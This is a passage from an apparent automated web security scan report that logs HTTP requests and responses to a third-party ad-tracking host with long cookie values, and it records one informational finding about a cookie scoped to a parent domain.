Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_Z35U="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAMqTK+yvs0UNiAwl8R+cnLZYDAKPht6YOsq7UHwThgQyPsjf9nPZuPqSJhCx0ltjkmipjVw1j+2QxI1g4jRqBraX7I4lUnu2sV/sixTduDjGnSlKXbMl+aYGHACU4PJlZ5Y0x4JtTJJMtWYFNjNegsShCGdTIygRSS4Q7ne6VpuiNwHUPR7nG5tHRgfQqMqHDcmBdNQo+aPKOPUHK0sY74QJib5NlMs8YrdLFO1jACoTFMK8NNu54Cks2hfhjVCF/C17zV40hYcHeoLqnFjzLRtQKCLw/NjSFnX/CLedLZhbEvrw0iWGWqR9ZM6XvqfAT3iksoGeJAFSmfmu3tSHfCbA27vImR4qMHsglZCh+zhBLukh0IsU0x6BPADxOF4BjqLVwkfzqPSX5dHLFSQqVp1QMQDLNtQtVsPz4JF9/tFQ6+uV1j31nx7W4Qk81MGDVjgJPX9+TMW52l6EZLZ7yhhhgJ/OviIVsdRNUOkkQ7FfhhbCekmx24qJu1wWXzfENbmLUuSCeo81f01GKVzachQvMthF/T4WLakpopzNfQwizI3hzQvFrgvWMiDZlnIHqEftdLBNGFWs8dtVA2wby/9mctpVNe+njNn9aHtLl/MZewwU2zbFFb+rcYb7W75TY0VpUxMm8+wvaDr0z0bxzKvW4lxrO8xhDVKzW5pmrl/ksG/joLPsf3yZqEHBnEblapKY7O+1z5Xut19mwgd2WLy/j6xzjOt/m+oTA1sEccN+ndN18yv5747wtLC9tW77SsXFFqIISdYyLzukYqofRNGmsbtRp4MmrVUsy0ZwmprRBuw1A3I5c45ewrFrD0x3hirBnjYS+316rgtBAhZ/thiXbjMFYb0XjWXLprMJI0W3hxlTbM81de65jGCPfav75CYtj+MVQ/K3RsYEdPFu+q9sijgTXwESTAsMV7BlrvVJJvQWMA2zhUy3iW7kxenQHlp7UJ8Fhsthj1yqNWVFzgjuV2dgc+Hlh76ktKbR4ifiixorZYIeDrp5CjEF/zILHg8trg5iTl0jeVyLcIZREsharpFNHllgDWanPsW41GF7YiSt39jwIKPj+mTkoiz5tBE+UrBsqvk2bqNU6w0WjAG73qh6nE2dz64rQ3CGe9gZkkwZEQAsCavJQ4na/BRcDENWxBEVNRwHJKWTyVC3sS3frY2T+p57BGJViqehLgC2kF+3UBJeiX37wjwKgFmwejJfuSCUUpNaTXtg/vFUJGOzZr6kMeUSMf74ON1CI3b4/q2XrhDlP0kwk35vOIm4bn50I7eeiJ/opkdOQbRXCt58yIlc/f11Ufn14HauJ1OG6KwUV7f1so="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIlHCCV4j1aEyaWbQK9/UfcNgGQxkM69Bg6zOefWQthJGqP3aEP/Els3EHmRToETTZFmihDhiVKOCXLxkj817TU7zj4ngiQ4oRnPnFK89XPRmRV4IWSdXROcDuxjITdkLEY03nS13tB3wtTOwQKZEgSeSALCIxbusJEfXL9zmpsCYE3Wt4xzi4o9NKvXRIGU8PiJjcr/rHOJeDVjh+8Nwr6ukBIEminfuLWPVX4RWXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMJ3r2QOoBVZ6ASf282CVOAOSDpU+OXdhOmqH9HP7OqPyI6xpt0c0TJESDLb5WBeWtWab7roDLXuJgIbJLfMum2OFFQDYj01itbl6WXy4n/R8UOW3gyhL7P4jFQHotLztydLwowndr8Ds39cz2s6lsU1+Do6PNRPGeZovOFhcxarjdrHQgs8YUJCIRRMMMjJP13Xu2JCaakMvJ6gV11ug0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8focd1Y/OmVpQkvMumF354n1sQFi+RgfRX5GqTUiWwUAhrgp4mzsjtVoMIOt3Qc3skR/puiAhs3ut3mUzX1HFiawgLnrfHoLTsTHqBAUaxNaaYUfEEWt6yzYS12lB/dF/R8aClBsKke+SOtUVddKniqvrHVs900YQCLT9OYzFt00dJNgaw1uus0Vq0AqNRYAjcAvs3zo8fMGKSf74sy/OW1+6zN7vch1/H6Cds3eX+q1eRrNTYsHd4Um/Nm0vBO5Ly4FGAtXo6cxHUXJJmcTHr68PZRgb1CkVu2+a2Ax/GfUECgADEUpcHeqHtcMfEGpwwjQXxru1bogLKOtfzrGrcLSacrROzrbUw+iXBU+UhRSGRsM0rx9K/cVsXTY6uupTM7QvIgbU8xzRCWC0HR0G4mmEaABfHKJVJXUA/6HK31slxFP3WXhudejLvJJdu44fKmyT5d5zOXpR1e+ljW83YkhCgNVOdkBuYS9Lrkledau0b9747MRH2sLKl+EOc8xqi8ODrNaSCXnlPwtCNvrW7iAAtTFQQXb7DTPwupPo31raAgrBQiCx/woACeKS7rGqpFa41E2D7AY0vCymq5rHBzmZwcs9Uap3I8MoBSjJNbUm5rSD7qjGXiA/asW7cdMyPtdg8k379gMCJK8Ot2OeGW2+Lg8ipfQyWcYqccHJ+DHGivC5ISnoP/NwF9xsuxVm4QhdhEUnjqX3hKY/uh5XCIullw5AiNguvw6i1jpFs2D5lRxYfgVNHrc+c/YlpoF1JRAbTKCkgsiz/hPnH2TuG6EJsMEbCo01RjWNaFUCiVIvbFUvZn+t7y3VCPlzeQjF4Gg7rVqNbo5hNH01RdxeyHXmnjJRMHfsoileps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQt6d6aHnIYEq9a69Ea3M4tXODD3XcB/gTJt8HgGWxAyr4CdIdyunMQpaw6zJMFCQXEw+FhIqIP56Jv53odUAL4abkzgSeTnh/wf+JRLa0feXPt/NHFEDnDpUPE2s19lF7S8PU5Fc30FUXgwbLNcoTg2ZLNLMEqdeyNSGUyXWrcdl0GtdlG+fwB1f8Z62fOMeRBP/DD9NdtK4tEwZivDa5W8u4G7UHeGWzfg6yo="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZhMOAOMVlHTPP5gq5zCNa0rYPc7/W5/tOB6t1C+8YVrUI/stLTnvrKwzrTh6r1/lJMXkAZBhiSC82T6ClT0elTJmBg8Q1q9++QjpRBjhYB8DdNksZbwqNPg1lID2sJ0DSSEZike+eI7JTxDjBep7ePn5StJQFkz791DEZ904ypIu6lQyxKTmJ0Qp/2ampa//+SeJCdvQ3nvcrjK6K5E7pYLbvARlFj9cLhHIcalthprDCcpF4nxHKfvJGuA4Al2HZ3ih+HIfpj2/bN/YYEVYEzYUIor3NFiqR9H1R4DT0pDVUk34hgfksfPZTBQxkFQiXw+/abLs1Dn+angzW7xqZCSnDGcfRReZqf09

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhJtAtAulshuQUoryC/72YVVpNDQxcStz5UE9IczXJqDvkR8JClzxrwAHhY+YjBm6np04WhfEL/eoVfAKmCRQVqFeoU+OeN2/icHrVPrSpYtdsbhmOoiXiQRjZAPYmdmJ0c3GcjdfXL1gz6cIKgqwZRyRAp3yB2fb8oEJDkCdaj1W5SXV4stWBFXjplvk2vRvQd7t3evrQRWwEj3HTwDIeOo1VRtQC8zTdfyUSwKvalgv0KxRPYFCwAjTe43HOmv7P0ZHGbEtoABz8ZSEnvImSYI9Qd30iLuULKP9f2HkrEaaiut73Au1UUcFnA50QKuxspCuvu8mrE/b/hVyfBjuGwF9/co4YMGL4e8jDJ+77LnuApfK42UX+LTBsWyiPIvAlEla/glRUyBK2+ufhADgjs66PEeur98RNTZXxh8C9rD9CZ91Tvim7MayKU/GLRkH07U6uupaT9oFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:36:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:36:40 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/656764106.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhyXtHbCSJbb2/JiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5YgysdNN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:45:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/656764106.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6L